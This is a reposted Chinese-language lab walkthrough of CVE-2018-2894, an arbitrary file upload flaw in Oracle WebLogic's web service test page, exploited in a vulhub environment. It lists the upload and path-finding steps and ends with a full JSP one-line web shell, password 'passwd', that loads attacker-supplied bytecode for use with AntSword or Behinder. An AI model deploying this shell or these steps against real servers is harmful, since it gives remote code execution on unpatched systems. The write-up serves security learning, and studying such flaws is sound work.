任意文件上传漏洞CVE-2018-2894
漏洞描述
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。
漏洞影响版本
weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。
IP地址 http://192.168.xxx.xxx:7001/console //进入后台系统
用户账号密码获取
vulhub靶场默认账户是weblogic 密码查看一下logs就能找到了
在kali上执行 docker-compose logs | grep password
环境准备
进入高级配置
在此处一定要进行勾选启用web服务器测试页,勾选后下拉的最下方进行保存配置
路径: http://192.168.17.130:7001/ws_utc/config.do
当前的工作目录路径,配置完成后进行保存
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
但在此处是有坑的如果这里的配置这里最后有css,那么上传文件后,你的访问链接应该是
路径:http://localhost:7001/ws_utc/css/config/keystore/1637485345393_shell.jsp
如果没有添加/css 那么上传文件后你的链接应该是
路径:http://localhost:7001/ws_utc/config/keystore/1637485345393_shell.jsp
安全->添加->浏览
上传成功之后,查看返回的数据包,其中有时间戳
可以通过查看源代码的方式或者使用Burp抓包进行获取
获取权限
获取权限的路径 http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]
我们可以使用蚁剑或者冰蝎进行连接来获取权限
http://192.168.17.130:7001/ws_utc/css/config/keystore/1666276503565_shell.jsp
shell.jsp 文件 (jsp一句话木马)
【连接密码】: passwd
-
<%!
-
class U extends ClassLoader {
-
U(ClassLoader c) {
-
super(c);
-
}
-
public Class g(byte[] b) {
-
return super.defineClass(b, 0, b.length);
-
}
-
}
-
-
public byte[] base64Decode(String str) throws Exception {
-
try {
-
Class clazz = Class.forName("sun.misc.BASE64Decoder");
-
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
-
} catch (Exception e) {
-
Class clazz = Class.forName("java.util.Base64");
-
Object decoder = clazz.getMethod("getDecoder").invoke(null);
-
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
-
}
-
}
-
%>
-
<%
-
String cls = request.getParameter("passwd");
-
if (cls != null) {
-
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
-
}
-
%>
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhcjahgj
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
excel图片置于文字下方的方法
PHP中文网 06-27 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
微信提示登录环境异常是什么意思原因
PHP中文网 04-09 -
微信运动停用后别人还能看到步数吗
PHP中文网 07-22 -
微信人名旁边有个图标有什么用
PHP中文网 03-11